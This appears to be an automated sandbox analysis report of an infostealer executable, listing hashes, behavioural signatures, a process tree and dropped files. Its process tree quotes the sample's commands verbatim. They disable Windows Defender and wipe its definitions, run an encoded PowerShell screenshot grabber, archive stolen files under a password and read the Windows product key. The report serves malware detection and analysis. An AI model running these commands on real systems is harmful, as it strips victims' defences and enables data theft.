Analysis

  • max time kernel
    101s
  • max time network
    104s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250410-en
  • resource tags

    arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15/04/2025, 19:03

General

  • Target

    turankyserchets.exe

  • Size

    7.8MB

  • MD5

    94dd93a1e09594567ba2f0bc1af13927

  • SHA1

    3d32ca71a96033eb2f9bfe18d9ae7eceea1d1951

  • SHA256

    79bdb910cdbac46bd809d30d00fbffbc4ec040e1149db4e3bd2675bfc7f1cfef

  • SHA512

    e03268ad5a8f23eb2ddaa0a7488b26291360dc5ad52500f4e058ca90be61c8f91e4d61a3e4bbcac3331b6c53dafd6b827b5a60d653a40a0d593ea6aaa818fde8

  • SSDEEP

    196608:KW5HUOXXKApTj9fZwQRCgiIKpdzjPOan7j2y283TOnOt:dxBw8wIKppDO9it

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe
    "C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe
      "C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\turankyserchets.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4444
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4360
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3340
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lawyjkz0\lawyjkz0.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5888
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71C5.tmp" "c:\Users\Admin\AppData\Local\Temp\lawyjkz0\CSCDE0DBC9056834B27B4736BC66334FE4D.TMP"
              6⤵
                PID:3884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\TEwMi.zip" *"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:480
          • C:\Users\Admin\AppData\Local\Temp\_MEI21922\rar.exe
            C:\Users\Admin\AppData\Local\Temp\_MEI21922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\TEwMi.zip" *
            4⤵
            • Executes dropped EXE
            PID:2160
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:440
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5796
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4844
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
              PID:1892
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5940
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2316
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3556
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4972
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1588
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1656

      Network

      MITRE ATT&CK Enterprise v16

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        aa4f31835d07347297d35862c9045f4a

        SHA1

        83e728008935d30f98e5480fba4fbccf10cefb05

        SHA256

        99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

        SHA512

        ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        9fe4cd5675481c6c8c97e2f2e9c76c96

        SHA1

        b97159260e37b3fa7e89852d825d8cf0583258ee

        SHA256

        70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51

        SHA512

        8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      • C:\Users\Admin\AppData\Local\Temp\RES71C5.tmp

        Filesize

        1KB

        MD5

        cc788167e56b5394d32549565b36e6c1

        SHA1

        d7e366ff94b32b949094443e861ea22e0f53055b

        SHA256

        bd30504faea6b4fc8dca7f3c1c2031ffce9e8e39f72b72ec211a66c25eec4a40

        SHA512

        c77349d86aa3e112ea5634f47be3f9e2f395f17e761c9f41c423096a167aaa7b20352bb98eee5fa72e0b017b85416cf830f117b8de142323f0e67ffa9cdef18c

      • C:\Users\Admin\AppData\Local\Temp\TEwMi.zip

        Filesize

        406KB

        MD5

        31d61f00e71aba9db0f37e1d6c306f61

        SHA1

        456295ef51304fa40c7e0fca17c1fd19c5490ba5

        SHA256

        4f9be535162ff396d38ed23b73fb1a0bd0902e42b2a3e8bd7357493ffe31d92c

        SHA512

        a109d718dfcbfd54d176a91c4306ed78bdd9005fa43c96f8b2550ddad1197f0ce4babb1badfbdfc7df78d32970ec7e6be65022567e877708d24586001589568e

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\VCRUNTIME140.dll

        Filesize

        117KB

        MD5

        32da96115c9d783a0769312c0482a62d

        SHA1

        2ea840a5faa87a2fe8d7e5cb4367f2418077d66b

        SHA256

        052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4

        SHA512

        616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_bz2.pyd

        Filesize

        49KB

        MD5

        d445b66c80c38f484dfd22c5bc99bfd6

        SHA1

        381644ec27f4874031401de9b994acfd8ddf6867

        SHA256

        44afb5ec148a9019f80e976c0649f9e4510cc4fc327b40019cd79cc019f6f6e6

        SHA512

        b25c142eb61246ed758e3cd347e32b22b34b3c7558e9929d9710433b6130e52d8a8f6906d1f69a2752771358967a945db9f064f1d0a6ab9db5eecbe33c2df8c8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_ctypes.pyd

        Filesize

        64KB

        MD5

        8ab8af95f0000bfd777d2e9832414d71

        SHA1

        a848d37a9a4bab18d5f90376a0098189dc653232

        SHA256

        2a94e57d22451726434544e1f8082c0e379e4ba768bfe7f7ada7db1d5b686045

        SHA512

        adbb5cc31d5ed019d4a5f527d7af14142cb200cf9497de9f1e36219a5db61abfb9b0a1799bce7c7c8c2ae36612420e95a38a6cf3119b5a0653ed3b9aa1a56dc5

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_decimal.pyd

        Filesize

        118KB

        MD5

        423d3c24a162c2f70e9862a446c5969a

        SHA1

        af94fc884d7abababf511a51d236962268e9be78

        SHA256

        eca8f9814896d44fb6f2ec31d1230b777be509f7f41640b7680df6f609e4de9c

        SHA512

        75c4b5119ca8b32d633a647d2adccb8c43857de523d4cb7a8c7b9d3c1f45e927f1efcfee26ab8fc7741bf83eef30c4dc4c558be40eff1e03f060b6cecf77d123

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_hashlib.pyd

        Filesize

        36KB

        MD5

        5f64eb23eed56e87b1e21f0790e59ba0

        SHA1

        95c5c3b7a6f322c07fe2dcdb3956bad7a5c35e09

        SHA256

        c3668794821c205b7de2ae1dd4c1feda18e2070a2ecc9ed6b6699234d5fc6b60

        SHA512

        494c5466c8971d64a4489b939bbb2978676b4abd7836478ac90bd09e7e084ddd5b4f459aeba588d12fbebceaca0d7fcd5f900172bad41c16f2d7f78c48c17490

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_lzma.pyd

        Filesize

        87KB

        MD5

        04ae3bb5f79fc405c70ab54645778c5a

        SHA1

        16b37028d52088ee4aa7966f1748b5f74d23409b

        SHA256

        dfe06ccb200a88e14cbdb9ebce03f704c0681f258187a19e638ce63290439194

        SHA512

        6fe41755c1b2cc2e363bb92ab8633f28f4e4938c88b7356b931e1f3511e68cd80693d71c729e233eadbef87e055538b8776d20ed54b64a2ae2df457d4acc840e

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_queue.pyd

        Filesize

        28KB

        MD5

        092de95c7338c37287b5ab0d580b26a1

        SHA1

        64b128f4deab8ec80be1b7eab3168b7af02d405b

        SHA256

        62290258f4e11c2293ee2602b4aaa1b12e00cd05c2d994d8476089f2d5299f9b

        SHA512

        f43df57e1998e170ab41129ebc90ca4d313f46cdc7e7abfce535fc2f0502f26ed6de5485f2831d00256180432cac7ef9a24df7b627c4e70b0b62eae750145ae5

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_socket.pyd

        Filesize

        45KB

        MD5

        a3e17f70f84e2b890d6382076573103b

        SHA1

        a0b429ee060f44987e1e48b75cd586e17e6ec3ec

        SHA256

        814981c6946fa14fab60433096062458afb990901344ea9d598d7872aee9d320

        SHA512

        39a6199ddb7e4eba080616cdc070260c3a6a9c047c211c74f311c8ef1e2aa058a182984b43d33febaaba518f1bdbea66b2be6ee05642d319115280e7007470da

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_sqlite3.pyd

        Filesize

        59KB

        MD5

        0ea6bb0d33c7ba53ea512292f03dc40d

        SHA1

        8deddea61c28855f9e5f8ffbc881cc5577fd482d

        SHA256

        74ab9c9394361a0dbf9251aa296b6349597450dc4abb0648c067e7797ca92b8d

        SHA512

        487449c4ee2f9478271c74352e2a3ab2b3b9e42ced4a51f490a4c1db0a652d98ee622a55867f14cab90700f77daf0b7c5fec67d8d3038b3ac5c5782dbc4dd808

      • C:\Users\Admin\AppData\Local\Temp\_MEI21922\_ssl.pyd

        Filesize

        68KB

        MD5

        0940325d7409d9d7d06def700ea2b96e

        SHA1

        0254073164eedef15e9eca4047b93c81ba113554

        SHA256

